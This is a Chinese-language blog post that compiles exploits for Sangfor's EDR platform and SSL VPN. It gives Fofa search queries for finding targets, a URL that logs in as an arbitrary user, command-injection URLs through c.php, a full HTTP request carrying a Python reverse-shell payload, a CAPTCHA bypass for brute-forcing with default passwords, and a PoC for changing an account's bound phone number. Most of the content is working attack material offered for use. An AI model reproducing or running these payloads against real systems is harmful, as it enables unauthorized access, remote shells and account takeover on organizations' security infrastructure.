深信服 终端检测相应平台 (EDR)
Fofa:语法 title=“终端检测响应平台”
一,任意用户登录漏洞
影响版本
EDR<=v3.2.19
漏洞复现
payload: user=任意
1 | https://XXX/ui/login.php?user=admin |
二,任意命令执行(一)
影响版本
3.2.16
3.2.17
3.2.19
漏洞复现
payload:
1 | https://www.0-sec.org/tool/log/c.php?strip_slashes=system&limit=whoami |
2 | |
3 | https://www.0-sec.org/tool/log/c.php?strip_slashes=system&host=whoami |
4 | |
5 | https://www.0-sec.org/tool/log/c.php?strip_slashes=system&path=whoami |
6 | |
7 | https://www.0-sec.org/tool/log/c.php?strip_slashes=system&row=whoami |
host参数命令执行
反弹shell payload:
1 | POST /tool/log/c.php HTTP/1.1 |
2 | Host: xxx |
3 | Connection: close |
4 | Cache-Control: max-age=0 |
5 | Upgrade-Insecure-Requests: 1 |
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0 |
7 | DNT: 1 |
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 |
9 | Content-Type: application/x-www-form-urlencoded;charset=utf-8 |
10 | Accept-Language: zh-CN,zh;q=0.9 |
11 | Cookie: PHPSESSID=b1464478cad68327229d8f46e60d0a08; _ga=GA1.4.112365795.1597799903; _gid=GA1.4.1225783590.1597799903 |
12 | Content-Length: 256 |
13 | |
14 | strip_slashes=system&host=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
深信服 SSL VPN - Pre Auth
指纹:
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
Fofa:
app=”深信服-SSL-VPN”
一,口令爆破
用户登录,若多次尝试登陆失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。
加密的密码也就是 sha1(password+sid)
爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/Sangfor@123
二,任意密码重置
三,修改绑定手机
POC
1 | https://www.0-sec.org/por/changetelnum.csp?apiversion=1 |
2 | post参数 |
3 | newtel=改的手机号&sessReq=clusterd&username=用户名&grpid=0&sessid=0&ip=127.0.0.1 |
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 1975763359@qq.com